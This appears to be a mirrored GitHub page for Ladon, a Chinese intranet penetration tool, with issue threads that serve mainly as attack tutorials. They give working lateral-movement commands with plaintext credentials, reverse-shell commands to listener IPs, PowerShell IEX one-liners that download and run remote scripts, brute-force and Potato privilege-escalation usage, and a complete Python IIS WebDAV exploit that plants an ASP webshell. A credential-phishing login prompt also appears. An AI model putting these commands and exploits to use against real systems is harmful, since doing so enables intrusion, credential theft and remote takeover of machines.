Coder Social home page Coder Social logo

k8gege / ladon Goto Github PK

View Code? Open in Web Editor NEW
4.6K 4.6K 851.0 208.83 MB

Ladon大型内网渗透工具,可PowerShell模块化、可CS插件化、可内存加载,无文件扫描。含端口扫描、服务识别、网络资产探测、密码审计、高危漏洞检测、漏洞利用、密码读取以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描等。Ladon 12.2内置262个功能,网络资产探测模块32个通过多种协议(ICMP\NBT\DNS\MAC\SMB\WMI\SSH\HTTP\HTTPS\Exchange\mssql\FTP\RDP)以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、交换机、数据库、打印机等信息,高危漏洞检测16个含MS17010、Zimbra、Exchange

Home Page: http://k8gege.org/Ladon/

License: MIT License

C# 10.26% Python 0.03% PowerShell 89.65% Go 0.05%
brute-force exp exploit getshell hack hacking ipscanner ladon netscan password pentest poc portscan scanner security security-scanner security-tools tools

ladon's Introduction

ladon's People

Contributors

k8gege avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

ladon's Issues

〖教程〗Ladon远程命令执行Wmiexec/psexec/atexec/psexec/webshell

http://k8gege.org/Ladon/WinShell.html

前言

在内网渗透中,横向移动用的最多的就是远程执行命令了,网上有很多相关工具,系统也自带相关命令。但不是体积大就是命令繁琐,如schtasks命令等,执行需先创建任务、执行任务、删除任务等,命令长,输错会浪费很多时间,即使复制粘贴也很麻烦。体积大的如Impacket中的psexec/atexec/smbexec/wmiexec等,若是使用PY2.7编译低版本最小也5M左右,最大可能37.5M,无论是内存加载或是传到目标都很麻烦,如果后渗透工具垃圾,区区这几M还未必能传上去,传上去得浪费很多时间。传一个就5M,传4个不得20M?基于以上原因,Ladon添加常用的远程执行命令功能,6.5体积仅844K就包含以上工具功能,扫描到相关密码,即可使用对应模块横向移动,一站式工具,完美一条龙服务。

Ladon远程执行命令

PSEXEC交互式回显

需先连接IPC,然后再通过psexec执行命令,类似psexec需445端口

net user \\192.168.1.8 k8gege520 /user:k8gege
Ladon psexec 192.168.1.8
psexec> whoami
nt authority\system

image

WmiExec非交互回显

并非所有机器都允许连接445端口,所以可通过135端口执行命令

Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami

image

AtExec非交互回显

通过sctask命令执行,可以SYSTEM权限或对应用户执行命令,需445端口
但是以用户权限执行命令需要远程机器登陆对应用户

Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami

image

SshExec非交互回显

一般开放SSH服务的有Linux系统,网络设备等,默认为22端口

Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami
Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami

image

JspShell非交互回显

支持菜刀以及Ladon自动GetShell时传的UAshell,详见:http://k8gege.org/p/ladon_cs_shell.html

Usage:Ladon JspShell type url pwd cmd
Example: Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami

image

WebShell非交互回显

支持7种脚本(jsp asp php aspx cfm py perl),3种类型WebShell(cd ua k8)
支持菜刀以及Ladon自动GetShell时传的UAshell,详见:http://k8gege.org/p/ladon_cs_shell.html

Usage:Ladon WebShell ScriptType ShellType url pwd cmd
Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami
Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami
Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami

image

工具下载

最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases

Ladon40.exe noping WebScan

Ladon40.exe noping WebScan
Ladon 6.0
By K8gege
Start: 2020-02-16 21:57:52
noping
load WebScan
Invalid IP (maybe need "noping" scan)
scan ip.txt (IP)

未经处理的异常: OutOfMemoryException

ip.txt中1w个ip地址,格式如下
118.118.118.112
118.118.118.112
118.118.118.112
118.118.118.112

noping功能有点迷

ladon40.exe noping 172.16.1.134 smbscan 会把整个ip段都扫一遍 就有点迷了
就因为加了个 noping 选项 ,不加就是正常的只扫一个单独ip

SmbScan 报错

环境: Windows 2008 R2 x64
Ladon40 可以使用,Ladon .net 2.x 调用SmbScan扫描时报错

image
System.IO.FileNotFoundException: 未能加载文件或程序集“System.Core, Version=3.5.
0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089”或它的某一个依赖项。系统
找不到指定的文件。
文件名:“System.Core, Version=3.5.0.0, Culture=neutral, PublicKeyToken=b77a5c561
934e089”
在 SharpCifs.Util.Sharpen.Extensions.Contains[T](ICollection`1 col, Object it
em)
在 SharpCifs.Util.Sharpen.Runtime.GetProperty(String key)
在 SharpCifs.Config..cctor()

警告: 程序集绑定日志记录被关闭。
要启用程序集绑定失败日志记录,请将注册表值 [HKLM\Software\Microsoft\Fusion!Enabl
eLog] (DWORD)设置为 1。
注意: 会有一些与程序集绑定失败日志记录关联的性能损失。
要关闭此功能,请移除注册表值 [HKLM\Software\Microsoft\Fusion!EnableLog]。

〖教程〗Ladon连接WebShell一句话远程执行命令

http://k8gege.org/Ladon/WebShell.html

前言

在内网渗透中,横向移动用的最多的就是远程执行命令了,网上有很多相关工具,系统也自带相关命令。但不是体积大就是命令繁琐,如schtasks命令等,执行需先创建任务、执行任务、删除任务等,命令长,输错会浪费很多时间,即使复制粘贴也很麻烦。体积大的如Impacket中的psexec/atexec/smbexec/wmiexec等,若是使用PY2.7编译低版本最小也5M左右,最大可能37.5M,无论是内存加载或是传到目标都很麻烦,如果后渗透工具垃圾,区区这几M还未必能传上去,传上去得浪费很多时间。传一个就5M,传4个不得20M?基于以上原因,Ladon添加常用的远程执行命令功能,6.5体积仅844K就包含以上工具功能,扫描到相关密码,即可使用对应模块横向移动,一站式工具,完美一条龙服务。

Ladon远程执行命令

PSEXEC交互式回显

需先连接IPC,然后再通过psexec执行命令,类似psexec需445端口

net user \\192.168.1.8 k8gege520 /user:k8gege
Ladon psexec 192.168.1.8
psexec> whoami
nt authority\system

image

WmiExec非交互回显

并非所有机器都允许连接445端口,所以可通过135端口执行命令

Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami

image

AtExec非交互回显

通过sctask命令执行,可以SYSTEM权限或对应用户执行命令,需445端口
但是以用户权限执行命令需要远程机器登陆对应用户

Ladon wmiexec 192.168.1.8 k8gege k8gege520 whoami

image

SshExec非交互回显

一般开放SSH服务的有Linux系统,网络设备等,默认为22端口

Ladon SshExec 192.168.1.8 k8gege k8gege520 whoami
Ladon SshExec 192.168.1.8 22 k8gege k8gege520 whoami

image

JspShell非交互回显

支持菜刀以及Ladon自动GetShell时传的UAshell,详见:http://k8gege.org/p/ladon_cs_shell.html

Usage:Ladon JspShell type url pwd cmd
Example: Ladon JspShell ua http://192.168.1.8/shell.jsp Ladon whoami

image

WebShell非交互回显

支持7种脚本(jsp asp php aspx cfm py perl),3种类型WebShell(cd ua k8)
支持菜刀以及Ladon自动GetShell时传的UAshell,详见:http://k8gege.org/p/ladon_cs_shell.html

Usage:Ladon WebShell ScriptType ShellType url pwd cmd
Example: Ladon WebShell jsp ua http://192.168.1.8/shell.jsp Ladon whoami
Example: Ladon WebShell aspx cd http://192.168.1.8/1.aspx Ladon whoami
Example: Ladon WebShell php ua http://192.168.1.8/1.php Ladon whoami

image

工具下载

最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases

关于dumplsass

请问dumplsass是怎么用的?需要导出lsass信息以后。
再使用mimikaz来看么?

〖教程〗Ladon迷你WEB服务器/一键内网HTTP服务器

〖教程〗Ladon迷你WEB服务器/一键内网HTTP服务器
http://k8gege.org/Ladon/webser.html

前言

你是否在为配置浏览器漏洞测试环境而烦恼,如配置Apache解析某种MIME测试某个漏洞
又或者在为内网机器无WEB又无法通过其它协议传输文件到内网另一台不出网的主机烦恼
还有些远程命令不支持多条语句,需要多次写入或HTTP一次性下载过去,显然都会选后者

应用场景

1.浏览器0day漏洞测试或VPS上一键部署,无需安装配置Apache
2.内网HTTP协议文件传输,如内网目标不出网不允许其它协议通过
3.Office/Word/Pdf等漏洞或远程下载SCT、HTA等格式的CS Payload
4.IP追踪,在邮件里放任意URL,当目标查阅邮件时,可记录访问IP
5.系统探测,无论用于XSS或IP追踪都会记录UA,确认目标操作系统
6.出网探测,内网命令行访问VPS-WEB,看到IP证明可通过HTTP出网

7.远控问题,内网可访问WEB,HTTP不上线,就不要甩锅网络或WAF
写个txt放CMD命令或结果,内网访问txt,若正常说明WAF根本不拦

PS:第7点做点修改就可以得到简单的HTTP马了类似CS,读取TXT获取CMD命令,然后执行。

WebSer启动

为了安全起见,文件不存在返回404,默认不列目录

Ladon web 80
Ladon webser 80

image

列目录

使用dir或dirlist参数,可返回WEB目录列表

Ladon web 80 dir
Ladon webser 80 dir

运行权限

使用TCP SOCKET实现的HTTP服务器,任意权限下都可以,不像HTTPlisten需管理员权限
很多人常说TCPListen和HTTPLinsen有什么区别,都可以实现一模一样的WEB服务器
但权限不一样,实现过程也不一样,就像不同快递,包装材料不一样,送达时间也不一样
直接使用HTTP不需要自己构造协议包,而使用TCP得自己构造HTTP包,这就是区别之一

文件下载

在Ladon同目录下放你想下载的文件,浏览器访问即可,命令行下载也可以

Linux: Wget、curl等
Windows: 10几20多种,自行去网上搜索

工具下载

最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases

〖教程〗Ladon For Cobalt Strike 3.x-4.x

http://k8gege.org/p/c5430395.html

前言

Ladon 6.2支持Cobalt Strike 4.0,内置58个功能
加载脚本Ladon.cna,通过Beacon命令或右键使用

应用场景

CS命令行下扫描目标内网,无需代理转发扫描收集信息、密码爆破等
跳板扫描外网资产(即无需代理直接通过在控机器扫描其它目标资产)

Ladon右键菜单

相比Beacon命令行,GUI就更简单了,只需填写IP、URL等,一键扫描

主菜单

资产扫描

漏洞检测

密码爆破

网络嗅探

信息收集

例子:WmiHash密码爆破

Beacon命令帮助

Example: Ladon help

1.MS17010 MS17-010漏洞扫描

Example: Ladon 192.168.1.8/24 MS17010
结果:IP、SMB漏洞、机器名、操作系统版本
MS17010

2.OSscan 操作系统探测

Example: Ladon 192.168.1.8/24 OSscan
通过SMB、多端口、Banner等方式探测(存活主机、主机名、域名、操作系统版本、开放服务等)
OSscan

3.OnlinePC 存活主机扫描

Example: Ladon 192.168.1.8/24 OnlinePC
也支持检测主机名/域名是否存活,结果IP、Mac、机器名
OnlinePC

4.WebScan Web扫描

Example: Ladon 192.168.1.8/24 WebScan
内网站点扫描,获取服务器Banner、网页标题
WebScan

5.FtpScan FTP密码扫描

Example: Ladon 192.168.1.8/24 FtpScan
需上传user.txt和pass.txt至beacon工作目录
FtpScan

6.WmiScan Win方式爆破Windows密码(IPC被拒绝时可尝试WMI)

Example: Ladon 192.168.1.8/24 WmiScan
Wmi方式批量爆破内网主机帐密,需上传user.txt和pass.txt至工作目录
WmiScan

7.CiscoScan 思科设备扫描

Example: Ladon 192.168.1.8/24 CiscoScan
(IP、设备型号、主机名、Boot、硬件版本)
CiscoScan

8.UrlScan C段域名URL扫描

Example: Ladon 192.168.1.8/24 UrlScan
通过源码获取域名或URL,但不验证IP,适用于内网扫描时,目标域名指向外网IP
或者通过域名判断内网站点是何产品,比如出现cisco.com域名,说明此为cisco设备
UrlScan

9.SameWeb C段旁站扫描

Example: Ladon 192.168.1.8/24 SameWeb
通过源码获取域名并验证IP,返回正确的同服站点,非bing或爱站等方式,即内网不可上网也可扫描
验证IP主要适用于,外网扫描时旁站,因为获取的域名指向外网时,无法通过IP判断是否属于同服
SameWeb

10.WeblogicExp & WeblogicPoc

Example: Ladon 192.168.1.8/24 WeblogicPoc
Example: Ladon 192.168.1.8/24 WeblogicExp
Weblogic漏洞扫描两个模块,一个是只扫描是否存在漏洞,另一个是扫描并且GetShell
WeblogicExp

11.EnumMSSQL 枚举局域网MS SQL SERVER数据库主机

Example: Ladon 192.168.1.8/24 EnumMSSQL
和PowerUpSql一样不一定能获取到SQL版本

12.EnumShare 枚举局域网共享资源

Example: Ladon 192.168.1.8/24 EnumShare

13.MssqlScan MSSQL数据库密码爆破

Example: Ladon 192.168.1.8/24 MssqlScan

14.MysqlScan MySQL数据库密码爆破

Example: Ladon 192.168.1.8/24 MysqlScan

15.SSHscan SSH主机密码爆破

Example: Ladon 192.168.1.8/24 SSHscan

16.OracleScan Oracle数据库密码爆破

Example: Ladon 192.168.1.8/24 OracleScan

17.HostIP 域名解析/主机名转IP

Example: Ladon 192.168.1.8/24 HostIP

18.WhatCMS Web指纹识别支持75种

Example: Ladon 192.168.1.8/24 WhatCMS
url.txt指定站点或批量站点扫描,也可扫描整个C段部分web端口对应CMS

19.IpcScan Windows密码爆破(Wmi被拒绝时可尝试Ipc)

Example: Ladon 192.168.1.8/24 IpcScan

21.EnBase64/DeBase64 Base64密码批量加密解密

Example: Ladon 明文字符串 EnBase64
Example: Ladon Base64内容 DeBase64

22.EnHex/DeHex Hex密码批量加密解密(3种格式)

Example: Ladon 明文字符串 EnHex
Example: Ladon 16进制内容 EnHex

23.SmbScan Windows密码爆破(Wmi被拒绝时可尝试,记录错误日志)

Example: Ladon 192.168.1.8/24 SmbScan

24.PhpStudyPoc PhpStudy后门检测

Example: Ladon 192.168.1.8/24 PhpStudyPoc

25.DomainIP 域名解析

Example: Ladon youdomain DomainIP

26.SubDomain 子域名爆破

Example: Ladon 192.168.1.8/24 SubDomain
需域名字典SubDomain.dic
例子: Ladon baidu.com SubDomain

27.WebDir Web目录扫描

Example: Ladon http://youweb.com WebDir

28.ActiveMQPoc ActiveMQ漏洞扫描

Example: Ladon 192.168.1.8/24 ActiveMQPoc

工具下载

最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases

〖教程〗Ladon反弹Shell系列教程(MSF/NetCat/PowerCat)联动

〖教程〗Ladon反弹Shell系列教程
http://k8gege.org/Ladon/ReverseShell.html

反弹TCP

Usage:
Ladon ReverseTcp ip port type
type: meter shell nc

监听nc shell

监听nc shell可用工具非常多,如NC、LadonGui、PowerCat、MSF等

nc -l -v -p 4444
LadonGui--Netcat--Listen
powercat -l -p 4444

反弹NC shell

Ladon ReverseTcp 192.168.1.8 4444 nc

反弹NC shell
image
LadonGui监听
image
常用NC监听
image

反弹MSF TCP Shell

Ladon ReverseTcp 192.168.1.8 4444 shell

image

反弹MSF TCP Meter

Ladon ReverseTcp 192.168.1.8 4444 meter

image
image

反弹TCP/UDP (CMD & PowerShell)

Load PowerCat
Usage:
Reverse Tcp: Ladon PowerCat -r 192.168.1.110 4444 cmd
Reverse Tcp: Ladon PowerCat -r 192.168.1.110 4444 psh
Reverse Udp: Ladon PowerCat -r 192.168.1.110 4444 cmd -u
Reverse Udp: Ladon PowerCat -r 192.168.1.110 4444 psh -u

反弹TCP,PowerCat监听执行PowerShell
image

反弹HTTP/HTTPS

Usage:
Ladon ReverseHttp ip port
Ladon ReverseHttps ip port

MSF监听
windows/meterpreter/reverse_http
windows/meterpreter/reverse_https

反弹MSF HTTPS Meter

Ladon ReverseTcp 192.168.1.8 4444 meter

反弹HTTPS
image
MSF HTTPS
image

工具下载

最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases

闪退

ladon和ladon40两个exe程序打开后都会闪退,其他均正常

〖教程〗LadonExp使用IIS写权限Webdav漏洞GetShell

原文:http://k8gege.org/Ladon/iisput

LadonExp生成器使用教程之IIS写权限漏洞利用,含环境配置、EXP生成、批量利用、Pyhton复现代码。

漏洞成因

该漏洞的产生原因来源于服务器配置不当造成,此漏洞主要是因为服务器开启了webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持PUT。

IIS配置

1 启用webdav组件
2 目录给写权限(为了方便直接eveyone完全写入权限)
3 脚本资源访问权限(不然MOVE失败即无法GetShell)

image

image

漏洞复现

使用LadonEXP可轻松复现此类漏洞,在Ladon改名前(Cscan)已复现过Tomcat,详情参考Tomcat CVE-2017-12615视频: https://github.com/k8gege/K8CScan/tree/master/Video

LadonExp配置PUT

功能:上传123.TXT
Target: http://192.168.1.22
Method: Put
addurl: 123.txt
Data: <%eval request(k8gege)%>
点击buildexe->TestExe测试
成功返回 Created

image

LadonExp配置MOVE

功能:将123.txt改名1.asp
Target: http://192.168.1.22/123.txt
Method: Move
Destination: http://192.168.1.22/1.asp

点击buildexe->TestExe测试
成功返回 Created

image

PS: 当然也可以直接PUT写入可解析的其它格式,也不一定非得先PUT再MOVE才能GetShell

Ladon批量

扫描C段,当然也可以A段B段

Ladon 192.168.1.1/c 生成.dll
Ladon 192.168.1.1/24 生成.dll

TXT批量

url.txt里放批量地址,不在同一个段的,示例如下
http://192.168.1.1
http://192.10.5.8:808

Ladon 生成.dll

Exploit

Python实现利用代码

#encoding="utf-8"
import requests

put_url = 'http://192.168.1.22/2.txt'
move_url = 'http://192.168.1.22/2.txt'
move_headers = {
    'Destination':'http://192.168.1.22/shell.asp'
}

put_data = "<%eval request('k8gege')%>"

post_data = {
    '#':''
}
try:
    response = requests.request('PUT',url=put_url,data=put_data)
    if response.status_code == 200:
        response = requests.request('MOVE',url=move_url,headers=move_headers)
        if response.status_code == 207:
            response = requests.post(url='http://192.168.1.22/shell.asp',data=post_data)
            print(response.content.decode("gb2312"))
        else:
            print(response.status_code)
except:
    pass
	

工具下载

最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases
IIS Exp: https://github.com/k8gege/iisput

〖教程〗13种密码爆破/暴力破解/网络认证/弱口令/数据库/网站后台/登陆口/系统登陆

暴力破解/网络认证/弱口令/密码爆破/数据库/网站后台/登陆口/系统登陆

模块功能 目标端口 目标系统 使用教程
SSH爆破 22端口 Linux http://k8gege.org/Ladon/sshscan.html
SMB爆破/IPC/共享 445端口 Windows http://k8gege.org/Ladon/SmbScan.html
WMI爆破 135端口 Windows http://k8gege.org/Ladon/WmiScan.html
Netbios爆破 139端口 Windows http://k8gege.org/Ladon/NbtScan.html
SMB-NtlmHash爆破 445端口 Windows http://k8gege.org/Ladon/SmbHashScan.html
WMI-NtlmHash爆破 135端口 Windows http://k8gege.org/Ladon/WmiHashScan.html
FTP爆破 21端口 多平台 http://k8gege.org/Ladon/ftpscan.html
VNC爆破 5900端口 多平台 http://k8gege.org/Ladon/VncScan.html
LDAP爆破 389端口 域环境 http://k8gege.org/Ladon/LdapScan.html
Oracle爆破 1521端口 多平台 http://k8gege.org/Ladon/OracleScan.html
MSSQL爆破 1433端口 Windows http://k8gege.org/Ladon/MssqlScan.html
MYSQL爆破 3306端口 多平台 http://k8gege.org/Ladon/MysqlScan.html
Weblogic后台爆破 7001端口 多平台 http://k8gege.org/Ladon/weblogicScan.html
Tomcat后台爆破 80等端口 多平台 http://k8gege.org/Ladon/TomcatScan.html
HttpBasic认证爆破 80等端口 多平台 http://k8gege.org/Ladon/HttpbasicScan.html
Winrm爆破 5985/5986端口 Windows http://k8gege.org/Ladon/WinrmScan.html
自定义协议爆破 协议对应端口 对应平台 http://k8gege.org/p/53177.html

PS:目标端口为服务默认端口,管理员把它改成其它端口也能爆破,目标系统也一样,指的是常见系统,如SSH跨平台的,不只是Linux的SSH,Unix、Mac、IOS、Iphone、思科各种路由器等,甚至windows上安装SSH,也一样可以爆破。还有FTP、甚至SMB也是一样,不要死板,不要死板,要懂举一反三,举一反三。

〖教程〗Ladon提权之Potato系列

原文: http://k8gege.org/Ladon/potato.html

Ladon提权之PipePotato/BadPotato/SweetPotato/PrintSpoofer

版本

>= Ladon 7.2.0
Update: 20200810

Potato提权原理

通过各种方法在本地NTLM中继获取SYSTEM令牌,再通过模拟令牌执行命令,通过以上方法提权统称为potato(不管是否基于原potato修改)。就像SQL注入,通过特定SQL语句注入获取特定数据库信息统称为SQL注入,而不管如何编写的SQL语句,是否基于别人的SQL语句修改。

提权条件

1 本地NTLM中继获取SYSTEM令牌
2 SeImpersonatePrivilege特权

测试中任意用户都可以通过本地NTLM中继获取到SYSTEM令牌权限,但是由于USER默认不开户SeImpersonatePrivilege特权,无法模拟令牌创建进程无法执行命令,所以会导致很多Potato提权失败。如下方”Win7管理员提权至SYSTEM“图片上部分就是USER部分的Potato提权失败,下方是管理员权限,而其它环境都是IIS权限。所以为了方便Ladon默认也显示当前用户SeImpersonatePrivilege特权情况。

SweetPotato

SweetPotato集成了原版Potato和JulyPotato的功能,包含DCOM/WINRM/PrintSpoofer方法获取SYSTEM。

Load SweetPotato
Local Privilege Escalation from Windows Service Accounts to SYSTEM
Vulnerable: Win7-Win10/Win2008-2019
Usage:
Ladon SweetPotato cmdline

PrintSpoofer

pipePotato:一种新型的通用提权漏洞,PrintSpoofer是一个利用打印机PIPE提权的方法,国人写了个工具叫BadPotato。

Load BadPotato
Local Privilege Escalation from Windows Service Accounts to SYSTEM
PrintSpoofer Abusing Impersonate Privileges.
Vulnerable: Win8-Win10/Win2012-2019
Usage:
Ladon BadPotato cmdline

测试环境

1 Win7 IIS 应用池用户权限
2 Win7 本地管理员用户权限
3 Win2012 IIS 应用池权限
4 Win7 本地服务用户权限
5 Win8 本地服务用户权限

PS:由于BadPotato不支持WIN7系统,所以以上环境主要以测试SweetPotato为主。

Win7管理员提权至SYSTEM

image

Win7 IIS应用池提权至SYSTEM

image

2012 R2 IIS应用池提权至SYSTEM

image

WIN7服务用户CS提权至SYSTEM

本地服务用户权限下直接以SYSTEM权限上控Cobalt Strike
image

WIN8服务用户提权至SYSTEM

image

IIS提权

http://k8gege.org/p/6b9b3afe.html

工具下载

最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases

〖公告〗最新版本下载(New Version Download)

最新版下载

Ladon7.0之后的版本暂时只能在"K8小密圈"下载,对于大部分人来说7.0及之前的版本是完全够用的。

旧版也够用

就像Nbtscan一个仅具备Ladon存活主机探测其中一个模块OnlinePC的几分之一功能,还不准确,某种程度上来说已跟不上时代的工具,依旧有人觉得够用,即便是Ladon旧版甚至早期版本Cping都比它好用很多,所以对于一些人来说根本没必要下最新版。

最新版区别

1.修复已发现的BUG
2.改进完善已有功能
3.特征更新识别更准,如OSSCAN、WhatCMS等更多方法、更多特征识别目标操作系统或CMS。
4.新增一些常用功能,大部分功能都在相关独立工具,只是为了方便不想传大多文件,一个搞定。当然个别功能也比其它独立工具好,比如PSEXEC执行命令传输时是加密的,而网上的却只是明文传输,所以并非只是单纯的集成功能,也有修改和优化。
5.后期也会增加一些新的模块,毕竟还有很多协议相关功能未实现,或者新洞扫描。

〖教程〗PowerShell远程内存加载(无文件渗透)

〖教程〗PowerShell远程内存加载(无文件渗透)
http://k8gege.org/Ladon/RemoteLadon.html

前言

本文仅是PowerLadon远程加载例子,并不代表只有这些功能。详情参考完整文档
脚本可直接远程内存加载使用无须免杀,或者有些人比较喜欢的所谓无文件渗透

完整文档:http://k8gege.org/Ladon

架设WEB服务器

使用命令 Ladon web 800 架设一个WEB服务器,用于远程下载脚本
实战可架设在VPS,或者架设在目标内网机器(因为有机器不能出网)
将脚本放在WEB目录下即可,当然大家也可以用IIS或APACHE搭建WEB

image

远程加载MS17010漏洞扫描

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon 192.168.1.8/24 MS17010"
image

远程加载Oracle弱口令爆破

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon 192.168.1.141 OracleScan"

远程加载SmbScan 445端口弱口令爆破

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon 192.168.1.141 SmbScan"
image

远程加载WmiScan 135端口弱口令爆破

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon 192.168.1.141 WmiScan"
image

远程加载SmbHash爆破内网主机(NtlmHash)

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon 192.168.1.40 SmbHash"
image

远程加载WmiHash爆破内网主机(NtlmHash)

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon 192.168.1.40 WmiHash"
image

远程加载反弹NC SHELL

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon ReverseTcp 192.168.1.3 4444 nc"

远程加载PowerCat反弹NC SHELL

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.110:800/Ladon6.6_all.ps1'); Ladon PowerCat 192.168.1.110 4444 cmd"
image

远程加载WMI内网横向

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon wmiexec 192.168.1.40 administrator k8gege520 whoami"
image

远程加载atexec内网横向

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon atexec 192.168.1.40 administrator k8gege520 whoami"
image

远程加载sshexec内网横向

powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon sshexec 192.168.1.40 root k8gege520 whoami"
image

远程加载SMBHASH爆破内网主机(NtlmHash)

C:\Users\null\Desktop\runnet>powershell "IEX (New-Object Net.WebClient).Download
String('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon 192.168.1.40 smbhash"
Ladon 6.6
Start: 2020-07-03 17:12:31
Runtime: .net 2.0  OS Arch: x86
OS Name: Microsoft Windows 7 旗舰版
192.168.1.40
load SmbHashScan
ICMP: 192.168.1.40      00-0C-29-0E-1D-50       VMware
192.168.1.40 445 Open
SmbHashCheck 192.168.1.40 administrator BCB4DEE13F1BE64A85DE5769056E3008
Successfully authenticated to the target
Found 192.168.1.40 administrator BCB4DEE13F1BE64A85DE5769056E3008 ISOK
IP Finished!
End: 2020-07-03 17:12:35

远程加载psexec内网横向

C:\Users\null\Desktop\runnet>powershell "IEX (New-Object Net.WebClient).Download
String('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon psexec 192.168.1.40"
Ladon 6.6
Start: 2020-07-03 15:35:55
Runtime: .net 2.0  OS Arch: x86
OS Name: Microsoft Windows 7 旗舰版
Load PsExec
[*] hostname: 192.168.1.40
[*] Choosing net35
[*] Copied net35 service executable to 192.168.1.40
[*] Installed net35 Service on 192.168.1.40
[*] Service Started on 192.168.1.40
psexec> whoami
nt authority\system

远程加载atexec内网横向

C:\Users\null\Desktop\runnet>powershell "IEX (New-Object Net.WebClient).Download
String('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon atexec 192.168.1.40 adm
inistrator k8gege520 whoami"
Ladon 6.6
Start: 2020-07-03 17:07:53
Runtime: .net 2.0  OS Arch: x86
OS Name: Microsoft Windows 7 旗舰版
Load AtExec
SmbExec by 0x7556
IPC Connected
=====================================================
nt authority\system

远程加载wmiexec内网横向

C:\Users\null\Desktop\runnet>powershell "IEX (New-Object Net.WebClient).Download
String('http://192.168.1.3:800/Ladon6.6_all.ps1'); Ladon wmiexec 192.168.1.40 ad
ministrator k8gege520 whoami"
Ladon 6.6
Start: 2020-07-03 17:17:28
Runtime: .net 2.0  OS Arch: x86
OS Name: Microsoft Windows 7 旗舰版
Load WmiExec
[!] Connecting with administrator
[i] Connecting to 192.168.1.40
[i] Connected
[i] Command: whoami
[i] Running command...
[i] Getting stdout from registry from SOFTWARE\
[i] Full command output received
win-4udh62v7dmn\administrator

获取本机IP与外网IP

image

使用指定用户执行命令

image

窃取指定进程令牌权限执行命令,如LSASS获取SYSTEM权限

image

工具下载

最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases

〖教程〗使用Ladon捕获Windonws登陆密码

http://k8gege.org/Ladon/GetWinAuth.html

版本

>= Ladon 6.6.3

原理

使用PowerShell模仿Windowns登陆认证获取管理员密码,Ladon监听捕获基础认证密码。

应用场景

域控或管理员密码获取,当前权限很低又无法提权时。(有权限直接读明文或HASH)

Ladon监听

该功能模仿了MSF里的基础认证监听模块,但最大的优势在于无需占用系统大量空间和内存。
可直接部署在目标内网或VPS上,也无需复杂命令,直接输以下命令一键监听自动捕获密码。
其它用途:http://k8gege.org/Ladon/webser.html

Ladon Web 800

image

PowerShell

